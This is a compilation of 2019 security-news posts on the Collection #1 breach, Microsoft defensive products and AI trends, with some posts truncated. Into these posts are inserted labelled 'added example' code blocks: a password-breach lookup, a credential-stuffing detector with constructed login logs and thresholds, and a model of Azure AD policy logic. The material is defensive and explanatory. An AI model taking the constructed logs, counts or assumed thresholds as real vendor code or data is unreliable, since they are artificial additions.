This list highlights some of the most prominent reasons why it’s essential to make cybersecurity a priority in 2019. Hackers get progressively more skilled at carrying out attacks, and they can cause significant catastrophes on unprotected or poorly defended

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – 2019 Cybersecurity predictions, cyberattacks)

The post 6 Reasons We Need to Boost Cybersecurity Focus in 2019 appeared first on Security Affairs.

Troy Hunt: the largest data leak in history

The Details of at Least 773 Million People Surfaced on a Free Cloud Storage Service

The details of at least 773 million people surfaced on free cloud storage service last week, reported Troy Hunt, Australian web security expert, and administrator of Have I Been Pwned (HIBP) website. As you might already know, Troy has been collecting data from many data breaches over the last five years. He has been compiling it into a single database, so people have the opportunity to search across multiple data breaches and find out if their details have been compromised at some point in the past. The website allows searches by password and email.

When we heard the news about what Gizmodo calls the ‘mother of all breaches,’ we initially thought that Troy Hunt and his database had been hacked. However, this was quickly debunked as Troy himself confirmed that he is the one who actually found the pile of stolen data. He called the breach ‘Collection #1’ and highlighted that this is the ‘single largest breach ever to be loaded into HIBP.’

This incident shows that Troy Hunt was not the only one who has been piling up information from past data breaches. An anonymous hacker uploaded approximately 12,000 files containing 772,904,991 emails and 21,222,975 unique passwords into a single large database. Troy reported that the 87GB worth of stolen data was published on a free cloud service called MEGA. What makes this breach particularly interesting is that this is the first part of a much bigger database of stolen data. Troy Hunt reported that he is in possession of four more collections, and he is currently reviewing them. He will be making a call on what to do with them after investigating them further. MEGA has since deleted the database.

While most of the data included in ‘Collection #1’ was already in HIBP, the data in collections #2 through #5 may end up making this one of the biggest data breaches ever seen. It is currently unknown if collections #2 to #5 are as big as ‘Collection #1’. If the remaining four collections are as significant as the first one, this may end up exposing details of billions of people.

What should you do?

The database is compiled of old data breaches, so if the data comes from known breaches, you most likely have been notified either by the service or by HIBP to change your password a long time ago. However, data breaches can take years to be discovered, so regular password changes are strongly recommended. Avoid using the same password on multiple platforms. The cybersecurity budgets of some companies are significantly lower than those of others – we are confident JP Morgan Chase spends more on developing stronger security than a t-shirt store does. But if the passwords you use at both organizations are the same, hackers can steal your details from the weak organization and use the login credentials to get unauthorized access to services such as your internet banking.

You can easily check if your passwords or email addresses have been part of ‘Collection #1’ or if they have been pwned in the past. You can search if your emails have been pwned here https://haveibeenpwned.com/, and learn if your passwords are part of the breach by testing them here https://haveibeenpwned.com/Passwords.
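The password check at https://haveibeenpwned.com/Passwords does not require the password to leave your machine. The block below is an added example written for this page, not Panda Security's or HIBP's own code; it reproduces the k-anonymity range lookup that the Pwned Passwords service uses: hash the password with SHA-1, send only the first five hex characters of the digest, receive every suffix sharing that prefix with its breach count, and match the remaining 35 characters locally. The range response in the block is a constructed sample. The `https://api.pwnedpasswords.com/range/` endpoint and the `Add-Padding` header used by the optional online fetch are taken from the public HIBP API documentation, not from this page.

```python
"""
Pwned Passwords k-anonymity check (added example, not HIBP's or Panda's code).

Only the 5-character SHA-1 prefix is ever sent; the suffix match happens
locally, so the service never learns which password was checked.
"""
import hashlib
from typing import Callable, Tuple


def hibp_split_hash(password: str) -> Tuple[str, str]:
    """Upper-case SHA-1 hex digest of the password, split into the
    5-char prefix that is sent and the 35-char suffix that stays local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range_response(suffix: str, body: str) -> int:
    """Parse a range response (one 'SUFFIX:COUNT' per line) and return the
    breach count for `suffix`, or 0 if it is absent. Padded dummy entries
    (returned when Add-Padding is requested) carry count 0, so they are
    treated the same as 'not found'."""
    for line in body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        candidate, count = line.split(":", 1)
        if candidate.upper() == suffix:
            return int(count)
    return 0


def password_breach_count(password: str, fetch: Callable[[str], str]) -> int:
    """Hash locally, fetch the range for the prefix via `fetch(prefix)`,
    and match the suffix on this side. Returns the breach count (0 = unseen)."""
    prefix, suffix = hibp_split_hash(password)
    return count_in_range_response(suffix, fetch(prefix))


# Constructed sample range response for prefix "5BAA6", the prefix of
# SHA-1("password"). Counts are made up; real responses run to hundreds of lines.
SAMPLE_RANGE_5BAA6 = """\
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471
0000A7E4B1D3C7C6D4A0E1F2B9C8D7E6F5A:2
FFFF0123456789ABCDEF0123456789ABCDE:0
"""


def offline_fetch(prefix: str) -> str:
    """Stand-in for the network call, serving the constructed sample only."""
    return SAMPLE_RANGE_5BAA6 if prefix == "5BAA6" else ""


def online_fetch(prefix: str) -> str:
    """Real lookup against the public HIBP API (network required; assumed
    endpoint and header from the HIBP docs, not from this page)."""
    import urllib.request
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"Add-Padding": "true", "User-Agent": "hibp-range-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        n = password_breach_count(pw, offline_fetch)
        print(f"{pw!r}: seen {n} times" if n else f"{pw!r}: not in sample range")
```

Swap `offline_fetch` for `online_fetch` to query the live service; the privacy property is the same either way, since `password_breach_count` only ever hands the five-character prefix to the fetch function.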

Last but not least, have anti-virus software installed on all your connected devices. Most of the time, high-quality anti-virus software comes with a password manager that will help you keep track of your passwords. Apart from the password management options, such software could also prevent hackers from stealing the missing piece of the puzzle that would allow them to make you a victim of cybercrime.


The post Troy Hunt: the largest data leak in history appeared first on Panda Security Mediacenter.

The Collection #1 Data Breach: Insights and Tips on This Cyberthreat

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the Equifax data breach, a new monster breach now has to become top of mind for us all. Say hello to Collection #1, a data set exposing 772,904,991 unique email addresses and over 21 million unique passwords.

Discovered by security researcher Troy Hunt, Collection #1 first appeared on the popular cloud service called MEGA. The Collection #1 folder held over 12,000 files that weigh in at over 87 gigabytes. When the storage site was taken down, the folder was then transferred to a public hacking site. What’s truly astonishing about this is that the data was not for sale; it was simply available for anyone to take.

You may be wondering, how was all this data collected? It appears that this data set was composed of a breach of breaches, aggregating over 2,000 leaked databases containing cracked passwords, in order to achieve maximum exposure. The sheer volume of this breach makes Collection #1 the second largest in size after Yahoo, and the largest public breach ever (given the data was openly exposed on the internet).

It appears that this data set is designed for use in credential-stuffing attacks, where cybercriminals will use email and password combinations to hack into consumers’ online accounts. The risks could be even greater for those who reuse credentials across multiple accounts. In order to help protect yourself from this threat, it’s vital that users act fast and use the following tips to help protect their data:

  • Use strong, unique passwords. In addition to making sure all of your passwords are strong and unique, never reuse passwords across multiple accounts. You can also enable a password manager to help keep track of your credentials.
  • Change your passwords. Even if it doesn’t appear that your data was breached, it’s better to err on the side of caution and change all of your passwords to better protect yourself.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.
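Credential stuffing, as described above, replays leaked email and password pairs against a login form. On the defender's side it shows up in authentication logs as a single source trying many distinct usernames in a short window, mostly failing, and often naming accounts that do not exist at all (because the dump was not collected from this service). The block below is an added example written for this page, not McAfee's code; the log format, the sample lines and the detection thresholds are constructed assumptions for illustration and would be tuned per service.

```python
"""
Credential-stuffing detector over authentication logs (added example).

Signal: one source IP, many distinct usernames, high failure rate inside a
short window. Accounts that DID succeed from a flagged source are reported
separately, because those are the ones that need a forced reset and MFA.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List

# Constructed log format: "<ISO-8601 UTC timestamp> <src_ip> <username> <result>"
# result is one of: success | bad_password | no_such_user
SAMPLE_AUTH_LOG = """\
2019-01-20T10:00:01Z 198.51.100.7 alice@example.com success
2019-01-20T10:00:05Z 203.0.113.9 bob@example.com bad_password
2019-01-20T10:00:06Z 203.0.113.9 carol@example.com no_such_user
2019-01-20T10:00:07Z 203.0.113.9 dave@example.com bad_password
2019-01-20T10:00:08Z 203.0.113.9 erin@example.com no_such_user
2019-01-20T10:00:09Z 203.0.113.9 frank@example.com no_such_user
2019-01-20T10:00:10Z 203.0.113.9 grace@example.com success
2019-01-20T10:00:11Z 203.0.113.9 heidi@example.com bad_password
2019-01-20T10:00:12Z 203.0.113.9 ivan@example.com no_such_user
2019-01-20T10:00:30Z 198.51.100.7 alice@example.com bad_password
2019-01-20T10:00:35Z 198.51.100.7 alice@example.com bad_password
2019-01-20T10:00:40Z 198.51.100.7 alice@example.com success
2019-01-20T10:20:00Z 192.0.2.44 judy@example.com bad_password
"""


@dataclass
class Attempt:
    ts: datetime
    src: str
    user: str
    result: str


@dataclass
class Finding:
    src: str
    window_start: datetime
    attempts: int
    distinct_users: int
    failure_rate: float
    unknown_user_rate: float
    compromised: List[str]  # usernames that authenticated from this source


def parse_auth_log(text: str) -> List[Attempt]:
    """Parse the constructed format into Attempt records."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = line.split()
        out.append(Attempt(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                           src, user, result))
    return out


def detect_credential_stuffing(attempts: List[Attempt],
                               window: timedelta = timedelta(minutes=5),
                               min_users: int = 5,
                               min_failure_rate: float = 0.7) -> List[Finding]:
    """Per source IP, slide a window over its attempts and flag the window with
    the most distinct usernames if it meets the thresholds (assumed values).
    A user retrying their own password a few times (198.51.100.7) is not
    flagged: few distinct users, so it never reaches min_users."""
    by_src = defaultdict(list)
    for a in attempts:
        by_src[a.src].append(a)

    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda a: a.ts)
        best = None
        j = 0
        for i, start in enumerate(evs):
            while j < len(evs) and evs[j].ts - start.ts <= window:
                j += 1
            chunk = evs[i:j]
            users = {a.user for a in chunk}
            if len(users) < min_users:
                continue
            failures = sum(a.result != "success" for a in chunk)
            unknown = sum(a.result == "no_such_user" for a in chunk)
            rate = failures / len(chunk)
            if rate < min_failure_rate:
                continue
            cand = Finding(src, start.ts, len(chunk), len(users), rate,
                           unknown / len(chunk),
                           sorted({a.user for a in chunk if a.result == "success"}))
            if best is None or cand.distinct_users > best.distinct_users:
                best = cand
        if best is not None:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect_credential_stuffing(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(f"{f.src}: {f.distinct_users} users in {f.attempts} attempts, "
              f"{f.failure_rate:.0%} failed, {f.unknown_user_rate:.0%} unknown; "
              f"successful logins to reset: {f.compromised}")
```

The unknown-user rate is the discriminator a plain brute-force detector lacks: a leaked list replayed against the wrong service produces many `no_such_user` results, which a legitimate user mistyping a password never does. The `compromised` list is the response input; those accounts authenticated with a reused password and are exactly the ones the post's advice on unique passwords and two-factor authentication is meant to protect.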

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

Protecting privileged access in DevOps and cloud environments

While security strategies should address privileged access and the risk of unsecured secrets and credentials, they should also closely align with DevOps culture and methods to avoid negatively impacting developer velocity and slowing the release of new services.

Figure: Example of tools in the DevOps pipeline

Despite this, 73 percent of organizations surveyed for the 2018 CyberArk Global Advanced Threat Landscape report have no strategy to address privileged access security for DevOps. Key recommendations The report … More

The post Protecting privileged access in DevOps and cloud environments appeared first on Help Net Security.

Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices

Digital transformation and the transition to a modern workplace encourage employee engagement, productivity, and collaboration. This transition poses major challenges in protecting sensitive information. In the modern workplace, the perimeter between the corporate network and the cloud is fading. Sensitive data constantly travels between different locations and is often shared with others both inside and outside the organization. This significantly increases the attack surface and makes identifying, protecting, and monitoring sensitive data challenging.

Additionally, the threat landscape is evolving. External adversaries and insider threats are becoming more sophisticated and dangerous. Data breaches are at an all-time high in terms of both the number of breaches and the overall severity and business impact. As a result, governments and regulators are instituting stricter regulations with unprecedented fines for not properly protecting and governing sensitive information.

Traditional solutions that put walls around your network perimeter do not suffice. You are at risk of over-protecting where you shouldn't, degrading employee productivity by interrupting legitimate workflows, and under-protecting where you should when sensitive data is being exfiltrated.

Consider the following principles when shaping your information protection strategy:

  1. Visibility: You can't protect what you can't see. Strive to achieve complete visibility into sensitive data across all repositories.
  2. Data-centric protection: Protect your data, not your perimeter. Apply information protection capabilities that are content-aware to improve protection coverage and reduce end-user friction due to unnecessary interruptions. Make sure sensitive data stays protected wherever it goes; this is especially important in a modern workplace, where data is constantly on the move.
  3. Assume breach: Sophisticated attackers, external adversaries, or insider threats will find a way around any wall you put in front of them. Implement post-breach techniques that constantly monitor sensitive data usage in your organization, correlate this data to other suspicious behaviors, and allow you to respond and mitigate risks.

The endpoint is a key point of control when implementing an effective information protection strategy based on these principles. Endpoints are often the entry point for sophisticated attacks conducted by an external adversary or an insider threat. Combine that with the fact that endpoints are usually the darkest spot in the enterprise for security and compliance teams, and you end up with a critical weakness in the enterprise information security posture.

Windows Defender Advanced Threat Protection (Windows Defender ATP), Microsoft's endpoint protection platform, addresses this challenge by integrating with Azure Information Protection, Microsoft's data classification, labeling, and protection solution. This integration empowers Windows to natively understand Azure Information Protection sensitivity labels, to provide visibility into sensitive data on endpoints, to protect sensitive data based on its content, and to detect and respond to post-breach malicious activity that involves or affects sensitive data.

Windows Defender ATP is built into the OS, removing the need for deployment and agent maintenance, ensuring that end-user experience is not impacted when performing legitimate business workflows. No on-premises infrastructure or endpoint agents are required. The seamless integration with Azure Information Protection reporting and management experience ensures that data administrators can continue to leverage their existing Azure Information Protection experience to manage these new capabilities.

Discover sensitive documents on Windows devices

Windows Defender ATP's built-in sensors discover labeled data on all devices monitored by the Windows Defender ATP service. This data is then seamlessly plugged into the Azure Information Protection reporting experience, which is enriched with the labeled documents discovered on Windows devices. This allows existing Azure Information Protection customers to get instant visibility into sensitive data on devices using the same dashboard and analytics tools they use today.

Figure 1. Azure Information Protection Data discovery dashboard shows data discovered by both Windows Defender ATP and Azure Information Protection

It doesn't end there. Being an endpoint protection suite, Windows Defender ATP monitors and calculates each device's machine risk level, an aggregated indicator of active security threats on that device. This data is also shared with Azure Information Protection reports, allowing data administrators to proactively understand whether sensitive corporate data resides on any compromised devices. To understand why a device is compromised, all it takes is a single click in the Azure Information Protection dashboard to be directed to that device's record in Windows Defender ATP, where the administrator can investigate and mitigate detected security threats.

Figure 2. Azure Information Protection Data discovery dashboard shows device risk calculation

Turning on this integration is a matter of a single flip of a switch in the advanced features settings page in Windows Defender Security Center. Windows endpoints will start discovering labeled documents immediately.

Figure 3. Windows Defender Security Center Settings page

Prevent sensitive data leaks from Windows devices

Windows Defender ATP can further protect sensitive data by providing data loss prevention (DLP) functionality. Built using the combined Windows Defender ATP native OS sensors and its advanced cloud-based analytics, Windows Defender ATP can help detect and mitigate data leak risks, ranging from accidental end-user mistake to a sophisticated malicious attack.

It all starts from the Office 365 Security and Compliance Center (SCC), Microsoft's unified management console for information protection, where you can manage information protection configuration settings on Windows devices. As part of the label policy, you can define whether files with a specific label applied will be protected by Windows Defender ATP.

Figure 4. Office Security & Compliance Center Endpoint data loss prevention configuration page

Once that policy is in place, Windows Defender ATP will start protecting documents with a matching label. Protection is applied by automatically enabling Windows Information Protection, which prevents unallowed client apps, cloud apps, and network locations from accessing protected files and their content, reducing the risk of data leak.

In addition, Windows Defender ATP integrates sensitive data awareness into Windows Defender Security Center. Each incident or alert raised in Windows Defender Security Center includes a data sensitivity attribute that is generated by aggregating the sensitivity of all the labeled files discovered on devices that are affected by the incident. This allows security analysts to prioritize incident response based on data sensitivity. When investigating an incident, security analysts can use data sensitivity context across the entire investigation from the incident dashboard, through analyzing sensitive data exposure of specific machines, all the way to Advanced hunting.

Figure 5. Windows Defender Security Center Incident queue, sorted by data sensitivity

Conclusion

Protecting sensitive data requires a comprehensive approach. Sensitive data stored on devices that are constantly on the move presents its own unique challenges. Windows Defender ATP and Azure Information Protection work together to effectively reduce the possibility of losing sensitive data. Together, these solutions provide discovery and protection capabilities required to govern and protect sensitive data, enforce compliance, and proactively mitigate risks.

These are just the first few steps we've taken to enhance the information protection capabilities. Stay tuned for more upcoming features built into Windows 10.

Start here to learn how you can leverage of this capability.

Omri Amdursky
Windows Defender ATP team

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices appeared first on Microsoft Secure.

Report: Iranian APT Actors Regroup After Main Security Forum Shuts Down

Iranian state-sponsored hackers are regrouping after the shutdown last year of their main security forum, migrating to other forums and making new connections for potential cyber-response against mounting political pressures from the United States and Europe, according to a new report.

The post Report: Iranian APT Actors Regroup After Main...

Step 3. Protect your identities: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 3. Protect your identities, you'll learn how to define security policies to protect individual user identities against account compromise and protect your administrative accounts.

Whether or not you have experienced a security incident in the past, you probably know that it's not a matter of if an attacker will successfully compromise your corporate resources, but when. This is what is meant by an “assume breach” mindset. Preventative measures are critical, but in an “assume breach” world, so are detection and rapid response. Azure Active Directory (Azure AD) Identity Protection can help you rapidly uncover anomalies or suspicious incidents and configure policies that will automate a response. With Azure AD Privileged Identity Management (PIM), you can protect your administrative accounts. The faster you discover a hacker and take back control, the less damage that attacker can do, saving you time, money, and reputation.

Reduce the time an attacker has access to your network

Most breaches begin with stolen or guessed user credentials. Once hackers gain access, they attempt to escalate those privileges, or they exploit their access to discover and target administrative users with access to valuable data. Rapid detection of a compromised account, no matter its access level, is critical. This can be challenging in a large enterprise with thousands of users.

Azure AD uses machine learning to analyze every sign-in to uncover anomalies or suspicious incidents. It then assigns a risk level of low, medium, or high to indicate how likely it is that the sign-in was not performed by the user. This is called a risk event. Azure AD also analyzes risk events for each user and calculates a risk level of low, medium, or high to indicate how likely it is that a user has been compromised. Azure AD Identity Protection uses this data to generate reports and alerts that can be viewed from a dashboard (Figure 1) in the Azure portal or by enabling daily or weekly emails.

Figure 1. Azure AD Identity Protection reports users who are likely compromised.

Automate response with Azure AD risk-based conditional access policies

In addition to reporting, Azure AD Identity Protection also lets you configure policies to automate a response based on conditions you define. A sign-in risk policy is a conditional access policy that you can configure based on the risk level assigned to a sign-in (Figure 2). A user risk policy is a conditional access policy that you can configure based on the likelihood that a user has been compromised. For example, we recommend that you create a sign-in risk policy that forces all medium-risk sign-ins to use Multi-Factor Authentication (MFA). We also recommend that users with a high risk level be required to safely change their password after verifying their identity using MFA. In both instances, these policies will be enforced automatically without any intervention by an administrator. (We'll go into more detail about Azure AD conditional access policies in our next blog.)

Figure 2. Apply a policy that blocks or flags risky sign-ins.

Protect your administrative accounts with Azure AD PIM

Even with good detection and response tools, there is still a chance that a hacker will make it through your defenses. In those instances, you need to minimize the likelihood that a compromised account can operate with a privileged role. Azure AD PIM gives you visibility into the users assigned to administrative roles and allows you to establish rules and policies that govern those accounts. Once you've identified the users, you can remove users who don't need privileged access and change the remaining users' assignments from permanent to eligible (Figure 3). A user who is eligible for administrative access must request access every time they wish to perform a privileged task. We recommend that you enable MFA for all privileged roles, so you can verify their identity. We also recommend that you establish time limits for administrator access. Users should only have access long enough to complete the privileged task. These steps will make it much more difficult for a hacker to gain access to your most valuable data and resources.

Figure 3. Protect administrative roles by setting users to “Eligible.”
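As an added example (not Microsoft's code and not the Azure AD API), the following Python models the policy logic described above: a sign-in at or above medium risk triggers MFA, a high-risk user must pass MFA and then change their password, and an eligible administrator activates a role only with MFA and only for a bounded window. The risk levels, user names, role name and timestamps are constructed inputs; Azure AD's machine-learning risk scoring is not modelled.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Risk levels as Identity Protection reports them, lowest to highest.
RISK_ORDER = {"none": 0, "low": 1, "medium": 2, "high": 3}


@dataclass
class SignIn:
    user: str
    sign_in_risk: str     # level assigned to this one sign-in
    user_risk: str        # level for the account as a whole
    mfa_completed: bool   # has the user already passed an MFA challenge?


@dataclass
class RiskPolicy:
    # Thresholds from the post: medium sign-in risk -> MFA; high user risk -> MFA + password change.
    mfa_at_sign_in_risk: str = "medium"
    password_change_at_user_risk: str = "high"


def evaluate_sign_in(event: SignIn, policy: RiskPolicy) -> Tuple[str, List[str]]:
    """Apply both risk policies to one sign-in with no administrator in the loop.
    Returns (decision, controls); decision is 'allow', 'challenge_mfa' or
    'require_password_change'."""
    controls: List[str] = []
    if RISK_ORDER[event.sign_in_risk] >= RISK_ORDER[policy.mfa_at_sign_in_risk]:
        controls.append("mfa")
    if RISK_ORDER[event.user_risk] >= RISK_ORDER[policy.password_change_at_user_risk]:
        if "mfa" not in controls:        # identity is verified before the reset
            controls.append("mfa")
        controls.append("password_change")
    if "mfa" in controls and not event.mfa_completed:
        return "challenge_mfa", controls
    if "password_change" in controls:
        return "require_password_change", controls
    return "allow", controls


@dataclass
class RoleAssignment:
    user: str
    role: str
    permanent: bool                      # True = standing access
    active_until: Optional[datetime] = None


class PrivilegedRoles:
    """Hypothetical PIM-style store: eligible roles, MFA-gated, time-boxed."""
    def __init__(self, max_activation: timedelta = timedelta(hours=1)):
        self.max_activation = max_activation
        self._assignments: Dict[Tuple[str, str], RoleAssignment] = {}

    def assign(self, user: str, role: str, permanent: bool = False) -> None:
        self._assignments[(user, role)] = RoleAssignment(user, role, permanent)

    def convert_permanent_to_eligible(self) -> List[str]:
        """The clean-up the post recommends: no standing admin access."""
        changed = []
        for a in self._assignments.values():
            if a.permanent:
                a.permanent, a.active_until = False, None
                changed.append(a.user)
        return changed

    def activate(self, user: str, role: str, now: datetime,
                 mfa_completed: bool, requested: timedelta) -> bool:
        """Eligible users request access per task; MFA is mandatory and the
        window is capped so access lasts only long enough for the task."""
        a = self._assignments.get((user, role))
        if a is None or a.permanent or not mfa_completed:
            return False
        a.active_until = now + min(requested, self.max_activation)
        return True

    def can_act(self, user: str, role: str, now: datetime) -> bool:
        a = self._assignments.get((user, role))
        if a is None:
            return False
        return a.permanent or (a.active_until is not None and now < a.active_until)


def demo() -> Dict[str, object]:
    """Constructed scenario: a standing Global Administrator is made eligible."""
    pim = PrivilegedRoles()
    role = "Global Administrator"
    pim.assign("dave", role, permanent=True)
    t0 = datetime(2019, 1, 15, 9, 0)     # constructed timestamp
    return {
        "converted": pim.convert_permanent_to_eligible(),
        "standing_access": pim.can_act("dave", role, t0),
        "activate_without_mfa": pim.activate("dave", role, t0, False, timedelta(hours=8)),
        "activate_with_mfa": pim.activate("dave", role, t0, True, timedelta(hours=8)),
        "active_after_30m": pim.can_act("dave", role, t0 + timedelta(minutes=30)),
        "active_after_2h": pim.can_act("dave", role, t0 + timedelta(hours=2)),
    }
```

`demo()` shows the PIM half end to end: the eight-hour activation requested is silently capped to the one-hour maximum, so the role is no longer usable two hours later.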

Learn more

Check back in a few weeks for our next blog post, Step 4. Set conditional access policies, where we'll dive into additional conditional access policies you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

The post Step 3. Protect your identities: top 10 actions to secure your environment appeared first on Microsoft Secure.

The evolution of Microsoft Threat Protection, January update

As the new year begins, progress with Microsoft Threat Protection continues. It remains one of the only solutions available in the market providing comprehensive, end-to-end security for the modern workplace. Microsoft Threat Protection helps users gain optimal security from the moment they sign in to their laptops or mobile devices, check their email or begin work on their documents, or utilize the many cloud applications common in the modern workplace. IT administrators benefit from minimal complexity in staying ahead of the threat landscape, gaining visibility and control over the expanding attack surface, and reducing the time, cost, and effort needed to understand and take action on the trillions of threat signals observed from their IT environment.

In previous posts, we provided examples of how Microsoft Threat Protection helps secure across identities, endpoints, email and data, apps, and infrastructure. We also highlighted how Microsoft Threat Protection quickly and efficiently handled the Tropic Trooper attack campaign. Today, we highlight examples of automation and seamless integration, which are core differentiators for Microsoft Threat Protection. We first discuss new automation capabilities that improve security for your apps ecosystem. Next, we share results from the MITRE evaluation that exemplify how signal sharing across integrated security services helps provide impressive threat detection capabilities for endpoints.

Simplifying the life of SecOps with automated security workflows

Automation is a key attribute of Microsoft Threat Protection. While it comes in many forms, the intent is always to help reduce the burden on security teams tasked with handling the myriad and frequent threats modern organizations deal with. Automation can address basic security needs, enabling security teams to focus on the more challenging security problems. This ultimately helps make organizations less susceptible to threats.

The following example demonstrates how our automation capabilities can simplify the oversight for cloud apps and services. Microsoft Threat Protection helps secure cloud apps and services with Microsoft Cloud App Security, a premier Cloud Access Security Broker (CASB) service. It gives visibility into cloud apps and services, provides sophisticated analytics to identify and combat cyberthreats, and enables control over data travel. Leading organizations such as Accenture leverage the monitoring capabilities of Cloud App Security to detect anomalous behavior in their SaaS and cloud apps. Now imagine adding the benefit of automated workflows to this already powerful service. We have heard feedback in countless discussions with Security Operations (SecOps) professionals that solutions enabling automated processes would help significantly by reducing the number of incidents requiring direct oversight.

To serve this customer need, we're excited to announce the integration of Microsoft Flow with Cloud App Security (Figure 1). This new integration supports a series of powerful use cases to enable centralized alert automation and orchestration by leveraging out-of-the-box and custom workflow playbooks that work with the systems of your choice. Microsoft Flow leverages an ecosystem of connectors from over 100 third-party services including ServiceNow, Jira, and SAP. The combination of Cloud App Security and Microsoft Flow will enable security specialists to create playbooks that work with systems of their choice and existing in-house processes, and automate the triage of alerts. Learn more about the detailed use cases and exciting capabilities this integration facilitates.

Figure 1. Microsoft Cloud App Security + Microsoft Flow integration schematic.

Demonstrating industry leading optics and detection for endpoint security

The Microsoft Intelligent Security Graph is the foundational element of Microsoft Threat Protection powering every service in the solution, providing a blend of deep and broad threat signals, and leveraging machine learning for intelligent signal correlation. The Intelligent Security Graph seamlessly integrates all Microsoft Threat Protection services, enabling each to share signal.

For example, Windows Defender Advanced Threat Protection (ATP) correlates signals across endpoints and identities by leveraging signal from Azure ATP (identity security). MITRE recently evaluated Windows Defender ATP's ability to detect techniques used by the attack group APT3 (also known as Boron or UPS). Windows Defender ATP's exceptional capabilities registered the best optics and top detection coverage across the attacker kill chain. Seamless integration is a tenet of Microsoft Threat Protection, and the results from the MITRE evaluation provide another example of how seamless integration across different security services leads to exceptional security gains.

It is important to note that MITRE evaluates detection capabilities only. Windows Defender ATP also provides protection and response to threats. In a customer environment, Windows Defender ATP would have blocked many of the attack techniques at onset by leveraging attack surface reduction and next-gen protection capabilities. In addition, investigation and hunting features enable security operations personnel to correlate alerts and incidents, enabling holistic response actions.

To learn more about Microsoft's MITRE results, read Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP and visit the MITRE website. Please reach out to your Microsoft rep to walk through the full details of the results.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection and read our previous monthly updates. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities.

Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, January update appeared first on Microsoft Secure.

AI: New Trends and Threats

Artificial Intelligence (AI) technology continues to evolve at an astounding pace. This year we will see a number of new developments which could have implications for home users like yourself.

Trend: AI-enabled chips

Although impressive, Artificial Intelligence systems are somewhat limited by the physical design of current computer chips. Processors like those found in your laptop at home are built for general workloads – playing games, surfing the web, writing emails etc.

The demands of AI applications are remarkably different however, so existing processors are unable to provide optimal performance. In 2019, manufacturers like Intel, NVIDIA, AMD, Qualcomm and ARM are set to release new chips that are optimised for AI. They will be focused on specific demands, like speech recognition and natural language processing.

What it means for you

As these new chips begin to appear in consumer electronics we should start to see features like voice assistants (Siri, Google Now, Amazon Alexa) become a lot more intelligent and effective. We should also see AI appearing in other technologies like cameras too.

Like every new technology, there is potential for hackers to exploit these chips to steal information or to break into networks. This is particularly true of cutting edge technology which may have bugs or security loopholes that are yet to be identified and fixed by the manufacturer.

Automated Machine Learning “let loose”

At the moment, AI takes a relatively long time to set up. This is because the system must first be taught how to work using a process called “Machine Learning” (ML). Usually this involves feeding large amounts of data into the system, then training it to understand what the information means.

Take Google’s Deep Learning system which can help to diagnose cancer for instance. Researchers fed thousands of breast scan images into the program, and then taught the application which pictures were positive for the presence of cancerous cells, and those which were clear. Eventually the system learned how to read the images automatically without needing guidance.

The problem is that this Machine Learning process can take a considerable amount of time to get right. Deep Mind has been years in the making.

2019 will see the release of a new development called AutoML, a technology designed to speed up and automate the training process. In future, developers will be able to define their application and expected outcomes, and AutoML will take care of the training and learning. This will make it much quicker and easier to build and release smart applications.

What does this mean for you?

Examples like Google Mind show how AI and Machine Learning can change the world. But at the same time, if AI is left to train itself without any safeguards in place, it is very difficult to predict potential outcomes. There is nothing to say that every decision or outcome made by the system will be positive or healthy.

Traditional coding errors create software bugs that can be exploited by cybercriminals. Similarly, misconfigured AutoML systems could create their own security weaknesses if not closely monitored by AI developers. If your data is held in one of these AI applications, there may be a risk of information being leaked, lost or stolen.

2019 – an exciting year

Artificial Intelligence systems are finally maturing and beginning to have an effect on day-to-day life. In most cases we will never see AI at work – but we should all begin to benefit in the near future.

The post AI: New Trends and Threats appeared first on Panda Security Mediacenter.

Cybersecurity Is Every Leader’s Job

Every organization is led by people who are responsible for setting the overall direction, establishing priorities, maintaining influence over organizational functions and mitigating risks. Given the wide range of organizational types across industry sectors, the titles associated with these roles may vary greatly from CEO to Managing Director to Owner-Operator and beyond, but they share […]

